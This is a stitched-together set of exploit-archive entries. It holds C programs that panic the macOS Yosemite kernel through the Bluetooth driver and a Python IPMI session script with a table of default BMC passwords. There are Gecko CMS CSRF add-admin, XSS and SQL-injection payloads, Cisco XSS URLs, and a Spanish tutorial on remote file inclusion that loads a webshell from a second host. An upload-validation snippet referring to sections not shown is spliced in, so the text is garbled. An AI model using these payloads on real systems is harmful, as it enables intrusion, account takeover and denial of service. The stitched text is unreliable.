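    """Return the name to store the upload under, or raise UploadRejected.

    The body decides the type; the declared Content-Type merely has to
    agree with it. A PHP script labelled image/png fails here, and so does
    a genuine PNG whose name ends in .php.
    """
    sniffed = sniff_type(body)
    if sniffed is None:
        raise UploadRejected("body does not start with a PNG or JPEG signature")
    if declared_type.split(";")[0].strip().lower() != sniffed:
        raise UploadRejected(f"declared {declared_type!r} but body is {sniffed}")
    name = safe_filename(filename)
    ext = os.path.splitext(name)[1]
    if ext not in EXT_FOR_TYPE[sniffed]:
        raise UploadRejected(f"extension {ext!r} not allowed for {sniffed}")
    return name


def is_accepted(filename: str, declared_type: str, body: bytes) -> bool:
    """True if validate_upload() would store the file, False if it rejects it."""
    try:
        validate_upload(filename, declared_type, body)
        return True
    except UploadRejected:
        return False


def index_row(stored_name: str) -> str:
    """Render one directory-index row with the name escaped in both the
    href attribute and the link text, so a name like '<img src=' is inert."""
    q = html.escape(stored_name, quote=True)
    return f'<tr><td><a href="/{q}">{q}</a></td></tr>'
```

The same three checks (body signature, extension allowlist, strict stem) also close the WP Symposium and Lexmark upload paths shown above, because neither a .php/.jsp name nor a traversal path survives `safe_filename()`.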


Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the upload POST method request is estimated as high. (CVSS 6.9)

1.2
The security risk of the arbitrary file upload vulnerability in the upload POST method request is estimated as high. (CVSS 6.6)


Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]


Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed 
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable 
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab 
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for 
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, 
policies, deface websites, hack into databases or trade with fraud/stolen material.

Domains:    www.vulnerability-lab.com   	- www.vuln-lab.com			       		- www.evolution-sec.com
Contact:    admin@vulnerability-lab.com 	- research@vulnerability-lab.com 	       		- admin@evolution-sec.com
Section:    magazine.vulnerability-db.com	- vulnerability-lab.com/contact.php		       	- evolution-sec.com/contact
Social:	    twitter.com/#!/vuln_lab 		- facebook.com/VulnerabilityLab 	       		- youtube.com/user/vulnerability0lab
Feeds:	    vulnerability-lab.com/rss/rss.php	- vulnerability-lab.com/rss/rss_upcoming.php   		- vulnerability-lab.com/rss/rss_news.php
Programs:   vulnerability-lab.com/submit.php  	- vulnerability-lab.com/list-of-bug-bounty-programs.php	- vulnerability-lab.com/register/

Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to 
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by 
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website 
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact 
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.

				Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]


-- 
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
            
/*
 * crash-issue3.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Exploits a missing check in
 * IOBluetoothHCIController::TransferACLPacketToHW() to trigger a panic.
 *
 * gcc -Wall -o crash-issue3{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;

  memset(&a, 0, sizeof(a));

  a.sizes[0] = 0x1000;
  a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

  a.sizes[1] = 0x1000;
  a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
  memset((void *)a.args[1], 0x22, 0x1000);


  /* Call DispatchHCISendRawACLData() */
  a.index = 0x63;

  /* Debug */
  for(int i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
  fflush(stdout);

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   sizeof(a),	       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
            
/*
 * crash-issue2.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Triggers a panic overwriting a stack_canary.
 *
 * gcc -Wall -o crash-issue2{,.c} -framework IOKit
 *
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;

  a.sizes[0] = 0x1000;
  a.args[0] = (uint64_t) calloc(a.sizes[0], sizeof(char));

  /* This arguments overflows a local buffer and the adjacent stack canary */
  a.sizes[1] = 264;
  a.args[1] = (uint64_t) calloc(a.sizes[1], sizeof(char));
  memset((void *)a.args[1], 'A', a.sizes[1]);

  /* Call IOBluetoothHCIUserClient::DispatchHCIReadLocalName() */
  a.index = 0x2d;

  /* Debug */
  for(int i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");
  fflush(stdout);

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,   /* inputStruct */
			   sizeof(a),	       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
            
/*
 * crash-issue1.c: Written for Mac OS X Yosemite (10.10) by @rpaleari and @joystick.
 *
 * Exploits a missing check in
 * IOBluetoothHCIUserClient::DispatchHCICreateConnection() causing a panic.
 *
 * gcc -Wall -o crash-issue1{,.c} -framework IOKit
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <mach/mach.h>
#include <mach/vm_map.h>

#include <IOKit/IOKitLib.h>

#define SIZE 0x1000

struct BluetoothCall {
  uint64_t args[7];
  uint64_t sizes[7];
  uint64_t index;
};

int main(void) {
  /* Finding vuln service */
  io_service_t service =
    IOServiceGetMatchingService(kIOMasterPortDefault,
				IOServiceMatching("IOBluetoothHCIController"));

  if (!service) {
    return -1;
  }

  /* Connect to vuln service */
  io_connect_t port = (io_connect_t) 0;
  kern_return_t kr = IOServiceOpen(service, mach_task_self(), 0, &port);
  IOObjectRelease(service);
  if (kr != kIOReturnSuccess) {
    return kr;
  }

  printf(" [+] Opened connection to service on port: %d\n", port);

  struct BluetoothCall a;
  int i;

  for (i=0; i<7; i++) {
    a.args[i] = (uint64_t) calloc(SIZE, sizeof(char));
    a.sizes[i] = SIZE;
  }

  /* This value causes IOMalloc() to fail */
  a.args[6] = 0x0;
  a.sizes[6] = 0x80000041;
  a.index = 0x06;	/* DispatchHCICreateConnection() */

  for(i = 0; i < 120; i++) {
    if(i % 8 == 0) printf("\n");
    printf("\\x%02x", ((unsigned char *)&a)[i]);
  }
  printf("\n");

  kr = IOConnectCallMethod((mach_port_t) port, /* Connection */
			   (uint32_t) 0,       /* Selector */
			   NULL, 0,	       /* input, inputCnt */
			   (const void*) &a,     /* inputStruct */
			   120,		       /* inputStructCnt */
			   NULL, NULL, NULL, NULL); /* Output stuff */
  printf("kr: %08x\n", kr);

  return IOServiceClose(port);
}
            
"""
For testing purposes only.

(c) Yong Chuan, Koh 2014
"""

from time import sleep
from socket import *
from struct import *
from random import *
import sys, os, argparse 

HOST = None
PORT = 623

bufsize = 1024
recv = ""


# create socket
UDPsock = socket(AF_INET,SOCK_DGRAM)
UDPsock.settimeout(2)

data = 21	#offset of data start

RMCP = ('\x06' + 	#RMCP.version = ASF RMCP v1.0
	'\x00' +	#RMCP.reserved
	'\xFF' +	#RMCP.seq
	'\x07'		#RMCP.Type/Class = Normal_RMCP/IPMI
	)



def SessionHeader (ipmi, auth_type='None', seq_num=0, sess_id=0, pwd=None):
	auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	sess_header = ''
	sess_header += pack('<B', auth_types[auth_type])
	sess_header += pack('<L', seq_num)
	sess_header += pack('<L', sess_id)
	if auth_type != 'None':		# compare by value, not identity
		raw = pwd + pack('<L', sess_id) + ipmi + pack('<L', seq_num) + pwd
		import hashlib
		h = hashlib.md5(raw)
		sess_header += h.digest()
	sess_header += pack('B', len(ipmi))
			
	return sess_header


class CreateIPMI ():
	def __init__ (self):
		self.priv_lvls = {'Reserved':0, 'Callback':1, 'User':2, 'Operator':3, 'Admin':4, 'OEM':5, 'NO ACCESS':15 }
		self.priv_lvls_2 = {0:'Reserved', 1:'Callback', 2:'User', 3:'Operator', 4:'Admin', 5:'OEM', 15:'NO ACCESS'}
		self.auth_types = {'None':0, 'MD2':1, 'MD5':2, 'Reserved':3, 'Straight Pwd':4, 'OEM':5}

	def CheckSum (self, bytes):

		chksum = 0
		q = ''
		for i in bytes:
			q += '%02X ' %ord(i)
			chksum = (chksum + ord(i)) % 0x100
		if chksum > 0:
			chksum = 0x100 - chksum

		return pack('>B', chksum)


	def Header (self, cmd, seq_num=0x00):
		#only for IPMI v1.5
		cmds = {'Get Channel Auth Capabilities'	: (0x06, 0x38), #(netfn, cmd_code)
			'Get Session Challenge'		: (0x06, 0x39), 
			'Activate Session'		: (0x06, 0x3a),
			'Set Session Privilege Level'	: (0x06, 0x3b),
			'Close Session'			: (0x06, 0x3c),
			'Set User Access'		: (0x06, 0x43),
			'Get User Access'		: (0x06, 0x44),
			'Set User Name'			: (0x06, 0x45),
			'Get User Name'			: (0x06, 0x46),
			'Set User Password'		: (0x06, 0x47),
			'Get Chassis Status'		: (0x00, 0x01)}
		ipmi_header = ''
		ipmi_header += pack('<B', 0x20)			#target addr
		ipmi_header += pack('<B', cmds[cmd][0]<<2 | 0) 	#netfn | target lun
		ipmi_header += self.CheckSum (ipmi_header)
		ipmi_header += pack('<B', 0x81)			#source addr
		ipmi_header += pack('<B', seq_num<<2 | 0)	#seq_num | source lun
		ipmi_header += pack('<B', cmds[cmd][1])		#IPMI message command

		return ipmi_header


	def GetChannelAuthenticationCapabilities (self, hdr_seq, chn=0x0E, priv_lvl='Admin'):
		ipmi = ''
		ipmi += self.Header('Get Channel Auth Capabilities', hdr_seq)
		ipmi += pack('<B', 0<<7 | chn)			#IPMI v1.5 | chn num (0-7, 14=current_chn, 15)
		ipmi += pack('<B', self.priv_lvls[priv_lvl])	#requested privilege level
		ipmi += self.CheckSum (ipmi[3:])
		
		return ipmi


	def GetSessionChallenge (self, hdr_seq, username, auth_type='MD5'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Get Session Challenge', hdr_seq)
		ipmi += pack('<B', self.auth_types[auth_type])	#authentication type
		ipmi += username				#user name
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def ActivateSession (self, hdr_seq, authcode, auth_type='MD5', priv_lvl='Admin'):
		#only for IPMI v1.5	
		ipmi = ''
		ipmi += self.Header('Activate Session', hdr_seq)
		ipmi += pack('>B', self.auth_types[auth_type])
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += authcode		#challenge string
		ipmi += pack('<L', 0xdeadb0b0)	#initial outbound seq num
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def SetSessionPrivilegeLevel (self, hdr_seq, priv_lvl='Admin'):
		#only for IPMI v1.5
		ipmi = ''
		ipmi += self.Header('Set Session Privilege Level', hdr_seq)
		ipmi += pack('>B', self.priv_lvls[priv_lvl])
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def CloseSession (self, hdr_seq, sess_id):
		ipmi = ''
		ipmi += self.Header ("Close Session", hdr_seq)
		ipmi += pack('<L', sess_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetChassisStatus (self, hdr_seq):
		ipmi = ''
		ipmi += self.Header ("Get Chassis Status", hdr_seq)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserAccess (self, hdr_seq, user_id, chn_num=0x0E):
		ipmi = ''
		ipmi += self.Header ("Get User Access", hdr_seq)
		ipmi += pack('>B', chn_num)		#chn_num = 0x0E = current channel
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


	def GetUserName (self, hdr_seq, user_id=2):
		ipmi = ''
		ipmi += self.Header ("Get User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserName (self, hdr_seq, user_id, user_name):
		#Assign user_name to user_id, replaces if user_id is occupied
		ipmi = ''
		ipmi += self.Header ("Set User Name", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += user_name.ljust(16, '\x00')
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserPassword (self, hdr_seq, user_id, password, op='set password'):
		ops = {'disable user':0, 'enable user':1, 'set password':2, 'test password':3}
		ipmi = ''
		ipmi += self.Header ("Set User Password", hdr_seq)
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', ops[op])
		ipmi += password.ljust(16, '\x00') #IPMI v1.5: 16bytes | IPMI v2.0: 20bytes
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi

	def SetUserAccess (self, hdr_seq, user_id, new_priv, chn=0x0E):
		ipmi = ''
		ipmi += self.Header ("Set User Access", hdr_seq)
		ipmi += pack('<B', 1<<7 | 0<<6 | 0<<5 | 1<<4 | chn)	#bit4=1=enable user for IPMI Messaging | chn=0xE=current channel
		ipmi += pack('>B', user_id)
		ipmi += pack('>B', self.priv_lvls[new_priv])
		ipmi += pack('>B', 0)
		ipmi += self.CheckSum(ipmi[3:])

		return ipmi


def SendUDP (pkt):

	global HOST, PORT, data

	res = ''
	code = ipmi_seq = 0xFFFF
	for i in range(5):
		try:
			UDPsock.sendto(pkt, (HOST, PORT))
			res = UDPsock.recv(bufsize)
		except Exception as e:
			print '[-] Socket Timeout: Try %d'%i
			sleep (0)
		else:
			#have received a reply
			if res[4:5] == '\x02':		#Session->AuthType = MD5
				data += 16
			code 	= unpack('B',res[data-1:data])[0]
			ipmi_seq= unpack('B',res[data-3:data-2])[0]>>2
			if res[4:5] == '\x02':
				data -= 16
			break
	return code, ipmi_seq, res


def SetUpSession (username, pwd, priv='Admin', auth='MD5'):

	global data

	#Get Channel Authentication Capabilities
	ipmi = CreateIPMI().GetChannelAuthenticationCapabilities(0, chn=0xE, priv_lvl=priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	#print '[+]%-30s: %02X (%d)'%('Get Chn Auth Capabilities', code, ipmi_seq)


	#Get Session Challenge
	ipmi = CreateIPMI().GetSessionChallenge(1, username, 'MD5')
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi) + ipmi)
	if code != 0x00:
		if code == 0xFFFF:
			print "[-] BMC didn't respond to IPMI v1.5 session setup"
			print "    If firmware had disabled it, then BMC is not vulnerable"
		return code, 0, 0, 0
	temp_sess_id 	= unpack('<L', res[data:data+4])[0]
	challenge_str 	= res[data+4:data+4+16]
	#print '[+]%-30s: %02X (%d)'%('Get Session Challenge', code, ipmi_seq)


	#Activate Session
	ipmi = CreateIPMI().ActivateSession(2, challenge_str, auth, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, auth, 0, temp_sess_id, pwd) + ipmi)
	if code != 0x00:
		return code, 0, 0, 0
	data += 16
	sess_auth_type 			= unpack('B', res[data:data+1])[0]
	sess_id 			= unpack('<L', res[data+1:data+1+4])[0]
	ini_inbound = sess_hdr_seq 	= unpack('<L', res[data+5:data+5+4])[0]
	sess_priv_lvl 			= unpack('B', res[data+9:data+9+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Activate Session', code, ipmi_seq)
	#print '   %-30s: Session_ID %08X'%sess_id
	data -= 16


	#Set Session Privilege Level
	ipmi = CreateIPMI().SetSessionPrivilegeLevel(3, priv)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_hdr_seq, sess_id) + ipmi)
	sess_hdr_seq += 1
	if code != 0x00:
		return code, 0, 0, 0
	new_priv_lvl = unpack('B', res[data:data+1])[0]
	#print '[+]%-30s: %02X (%d)'%('Set Session Priv Level', code, ipmi_seq)


	return code, temp_sess_id, sess_hdr_seq, sess_id
	

def CloseSession (sess_seq, sess_id):

	global data

	#Close Session
	ipmi = CreateIPMI().CloseSession(5, sess_id)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	#print '[+]%-30s: %02X (%d)'%('Close Session', code, ipmi_seq)

	return code


def CheckSessionAlive(sess_seq, sess_id):
	#SetUserPassword(): "user enable <user_id>"
	ipmi = CreateIPMI().GetChassisStatus(31)
	code, ipmi_seq, res = SendUDP (RMCP + SessionHeader(ipmi, 'None', sess_seq, sess_id) + ipmi)
	print '[+] %-35s: %02X (%d)'%('CheckSessionAlive->GetChassisStatus', code, ipmi_seq)
	sess_seq += 1
	
	return sess_seq





def banner():
        print ("######################################################\n"+\
               "## This tool checks whether a BMC machine is vulnerable to CVE-2014-8272\n"+\
               "## (http://www.kb.cert.org/vuls/id/843044)\n"+\
               "## by logging the TemporarySessionID/SessionID in each IPMI v1.5 session,\n"+\
               "## and checking that these values are incremental\n"+\
               "## \n"+\
               "## Author:  Yong Chuan, Koh\n"+\
               "## Email:   yongchuan.koh@mwrinfosecurity.com\n"+\
               "## (c) Yong Chuan, Koh 2014\n"+\
               "######################################################\n")


def main():

        banner()
        
        #default usernames/passwords (https://community.rapid7.com/community/metasploit/blog/2013/07/02/a-penetration-testers-guide-to-ipmi)
        vendors = {"HP"         :{"user":"Administrator",       "pwd":""},     #no default pwd: <factory randomized 8-character string>
                   "DELL"       :{"user":"root",                "pwd":"calvin"},
                   "IBM"        :{"user":"USERID",              "pwd":"PASSW0RD"},
                   "FUJITSU"    :{"user":"admin",               "pwd":"admin"},
                   "SUPERMICRO" :{"user":"ADMIN",               "pwd":"ADMIN"},
                   "ORACLE"     :{"user":"root",                "pwd":"changeme"},
                   "ASUS"       :{"user":"admin",               "pwd":"admin"}
                   }
        
        arg = argparse.ArgumentParser(description="Test for CVE-2014-8272: Use of Insufficiently Random Values")
        arg.add_argument("-i", "--ip", required=True, help="IP address of BMC server")
        arg.add_argument("-u", "--udpport", nargs="?", default=623, type=int, help="Port of BMC server (optional: default 623)")
        arg.add_argument("-v", "--vendor", nargs="?", help="Server vendor of BMC (optional: for default BMC credentials)")
        arg.add_argument("-n", "--username", nargs="?", default=None, help="Username of BMC account (optional: for non-default credentials)")
        arg.add_argument("-p", "--password", nargs="?", default=None, help="Password of BMC account (optional: for non-default credentials)")

        args = arg.parse_args()

        if args.vendor is not None: args.vendor = args.vendor.upper()
        if (args.vendor is None or args.vendor not in vendors.keys()) and (args.username is None or args.password is None):
                print "[-] Error: -n and -p are required because -v is not specified/in default list"
                print "    Vendors with Default Accounts"
                print "    -----------------------------------"
                for vendor,acct in vendors.iteritems():
                        print "    %s: username='%s', password='%s'"%(vendor,acct["user"],acct["pwd"])
                sys.exit(1)
        
        if args.username is None:   args.username = vendors[args.vendor]["user"].ljust(16, '\x00')
        if args.password is None:   args.password = vendors[args.vendor]["pwd"].ljust(16, '\x00')


        global HOST, PORT
        HOST = args.ip  
        PORT = args.udpport

        print "Script Parameters"
        print "-------------------------"
        print "IP       : %s"%HOST                        
        print "Port     : %d"%PORT
        print "Username : %s"%args.username
        print "Password : %s"%args.password

        session_ids = []
        for i in xrange(0x80):  #do not go beyond 0xFF, because of how session_ids is checked for incremental later
                try:
                        code, temp_sess_id, sess_seq, sess_id = SetUpSession (args.username, args.password, priv='Admin', auth='MD5')
                        if code == 0:
                                session_ids.append(temp_sess_id)
                                session_ids.append(sess_id)
                                print '[+%04X] temp_sess_id=%08X, sess_id=%08X'%(i, temp_sess_id, sess_id)
                        else:
                                #print '[-%04X] SetUp Session: Trying again after timeout 5s'%(i)
                                sleep(5)
                                continue


                        code = CloseSession (sess_seq, sess_id)
                        if code == 0:
                                #print '[+%04X] Close Session OK'%(i)
                                i += 1
                                sleep (0.5)
                        else:
                                #print '[-%04X] Close Session fail: Wait for natural timeout (60+/-3s)'%(i)
                                sleep(65)

                except Exception as e:
                        exc_type, exc_obj, exc_tb = sys.exc_info()
                        fname = os.path.split(exc_tb.tb_frame.f_code.co_filename)[1]
                        print (exc_type, fname, exc_tb.tb_lineno)


        session_ids = session_ids[:0xFF]
        
        #get the first incremental diff
        const_diff = None
        for i in xrange(1, len(session_ids)):
                if session_ids[i-1] < session_ids[i]:
                        const_diff = session_ids[i] - session_ids[i-1]
                        break
        #check if session_ids are increasing at a fixed value
        vulnerable = True
        crossed_value_boundary = 0
        for i in xrange(1, len(session_ids)):

                if session_ids[i]-session_ids[i-1] != const_diff:
                        if crossed_value_boundary < 2:
                                crossed_value_boundary += 1
                        else:
                                vulnerable = False

        if vulnerable:
                print "Conclusion: BMC is vulnerable to CVE-2014-8272"
        else:
                print "Conclusion: BMC is not vulnerable to CVE-2014-8272"

        
        



if __name__ == "__main__":
    main()
            
Gecko CMS 2.3 Multiple Vulnerabilities

Vendor: JAKWEB
Product web page: http://www.cmsgecko.com
Affected version: 2.3 and 2.2

Summary: Gecko CMS is the way to go, forget complicated, bloated
and slow content management systems, Gecko CMS has been built to
be intuitive, easy to use, extendable to almost anything, running
on all standard web hosting (PHP and one MySQL database, Apache is
a plus), browser compatibility and fast, super fast!

Desc: Gecko CMS suffers from multiple vulnerabilities including
Cross-Site Request Forgery, Stored and Reflected Cross-Site Scripting
and SQL Injection.

Tested on: Apache/2
           PHP/5.4.36


Vulnerabilities discovered by Gjoko 'LiquidWorm' Krstic
                              @zeroscience


Advisory ID: ZSL-2015-5222
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2015-5222.php

27.12.2014
---

CSRF Add Admin:
===============
<html>
<body>
<form action="http://server/admin/index.php?p=user&sp=newuser" method="POST">
<input type="hidden" name="jak_name" value="Testingus2" />
<input type="hidden" name="jak_email" value="test2@test.test" />
<input type="hidden" name="jak_username" value="Testusername2" />
<input type="hidden" name="jak_usergroup" value="3" />
<input type="hidden" name="jak_access" value="1" />
<input type="hidden" name="jak_password" value="123123" />
<input type="hidden" name="jak_confirm_password" value="123123" />
<input type="hidden" name="save" value="" />
<input type="submit" value="Submit form" />
</form>
</body>
</html>

usergroup 4 = moderator
          3 = administrator
          2 = member standard
          1 = guest
          5 = banned

Stored XSS (params: jak_img, jak_name, jak_url):
================================================

POST http://server/admin/index.php?p=categories&sp=newcat HTTP/1.1

jak_catparent	0
jak_catparent2	0
jak_footer	1
jak_img	"><script>alert(1);</script>
jak_lcontent	<p>test</p>
jak_lcontent2	
jak_menu	1
jak_name	"><script>alert(2);</script>
jak_name2	
jak_url	"><script>alert(3);</script>
jak_varname	ZSL
save	

SQL Injection (params: jak_delete_log[], ssp):
==============================================

POST /admin/index.php?p=logs&sp=s HTTP/1.1

delete=&jak_delete_log%5B%5D=4%20and%20benchmark(20000000%2csha1(1))--%20&jak_delete_log%5B%5D=2&jak_delete_log%5B%5D=1

--

GET /admin/index.php?p=logs&sp=delete&ssp=3[SQLi] HTTP/1.1

Reflected XSS:
==============

/admin/index.php [horder%5B%5D parameter]
/admin/index.php [jak_catid parameter]
/admin/index.php [jak_content parameter]
/admin/index.php [jak_css parameter]
/admin/index.php [jak_delete_log%5B%5D parameter]
/admin/index.php [jak_email parameter]
/admin/index.php [jak_extfile parameter]
/admin/index.php [jak_file parameter]
/admin/index.php [jak_hookshow%5B%5D parameter]
/admin/index.php [jak_img parameter]
/admin/index.php [jak_javascript parameter]
/admin/index.php [jak_lcontent parameter]
/admin/index.php [jak_name parameter]
/admin/index.php [jak_password parameter]
/admin/index.php [jak_showcontact parameter]
/admin/index.php [jak_tags parameter]
/admin/index.php [jak_title parameter]
/admin/index.php [jak_url parameter]
/admin/index.php [jak_username parameter]
/admin/index.php [real_hook_id%5B%5D parameter]
/admin/index.php [sp parameter]
/admin/index.php [sreal_plugin_id%5B%5D parameter]
/admin/index.php [ssp parameter]
/admin/index.php [sssp parameter]
/js/editor/plugins/filemanager/dialog.php [editor parameter]
/js/editor/plugins/filemanager/dialog.php [field_id parameter]
/js/editor/plugins/filemanager/dialog.php [fldr parameter]
/js/editor/plugins/filemanager/dialog.php [lang parameter]
/js/editor/plugins/filemanager/dialog.php [popup parameter]
/js/editor/plugins/filemanager/dialog.php [subfolder parameter]
/js/editor/plugins/filemanager/dialog.php [type parameter]
            
source: https://www.securityfocus.com/bid/47901/info
    
Cisco Unified Operations Manager is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
    
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials. Other attacks may also be possible.
    
This issue is being tracked by Cisco Bug ID CSCtn61716.

http://www.example.com/iptm/logicalTopo.do?clusterName=&ccmName=ed1b1"%3balert(1)//cda6137ae4c
http://www.example.com/iptm/logicalTopo.do?clusterName=db4c1"%3balert(1)//4031caf63d7
            
source: https://www.securityfocus.com/bid/47901/info
   
Cisco Unified Operations Manager versions prior to 8.6 are vulnerable.

http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?clusterName=d4f84"%3balert(1)//608ddbf972
http://www.example.com/iptm/faultmon/ui/dojo/Main/eventmon_wrapper.jsp?deviceName=c25e8"%3balert(1)//79877affe89
            
source: https://www.securityfocus.com/bid/47901/info

http://www.example.com/iptm/eventmon?cmd=filterHelperca99b<script>alert(1)</script>542256870d5&viewname=device.filter&operation=getFilter&dojo.preventCache=1298518961028
http://www.example.com/iptm/eventmon?cmd=getDeviceData&group=/3309d<script>alert(1)</script>09520eb762c&dojo.preventCache=1298518963370
            

El Remote File Inclusion (RFI) es una vulnerabilidad muy parecida al LFI (Local File Inclusion). La diferencia es que mientras el LFI te permite la inclusión de archivos locales, el RFI te permite incluir archivos remotos.

Claro esto es super turbio, porque si nosotros como atacante nos montamos un servidor web. Podemos aprovechar el RFI de la máquina víctima para que cargue e interprete como si fuera suyo un archivo malicioso que estemos alojando.

Vamos a montarnos la vulnerabilidad en local:

Primero de todo, creamos el archivo PHP que alojará la inclusión de archivos:

image 133

Este es un código sencillo donde a partir de una petición GET, el servidor recibirá un valor por el parámetro «file» e incluirá el archivo con ese nombre en la página.

Con este código, si accedemos a la URL:

  • http://localhost/index.php?file=/etc/hosts

Nos cargará el archivo hosts. Sin embargo, tenemos que habilitar que admita también URLs. Para ello, nos dirigimos a la configuración de PHP, la podemos encontrar con:

image 134

Como en mi caso el servidor web lo voy a montar usando el propio comando PHP, editaré el archivo de configuración de la segunda línea.

Dentro de este archivo, tenemos que buscar la variable allow_url_include:

image 124

Por defecto, el valor de esta variable será Off, por lo que nosotros simplemente la cambiamos a On y listo.

Con esto hecho, ya simplemente nos montamos el servidor web con el comando php:

  • php -S localhost:80
image 135
image 126

Podemos comprobar que el archivo y el servidor web funcionan correctamente, ya que el LFI funciona, esto ocurre porque el LFI y el RFI comparten el mismo código PHP, por lo que al comprobar que el LFI funciona sabemos que todo está correctamente.

Ahora bien, en otro equipo, voy a alojar el archivo malicioso (una webshell) y voy a montar un servidor web:

image 127

Ahora mismo este equipo que es un Debian con IP 192.168.118.131 está compartiendo el archivo sikushell.php.

Por lo que si yo ahora desde el servidor web vulnerable, cambio el /etc/hosts por la dirección del servidor web del Debian, debería de recibir una petición GET:

image 128
image 129

Efectivamente, por el lado del servidor recibo la petición GET, y por el lado del cliente puedo visualizar todo lo este está compartiendo. Ahora, además de especificar el servidor web, vamos a dirigirnos al archivo sikushell.php:

image 130

Parece que existe, pero no nos muestra nada, esto es porque está esperando el parámetro cmd, que es el que hemos indicado en el archivo malicioso:

image 131

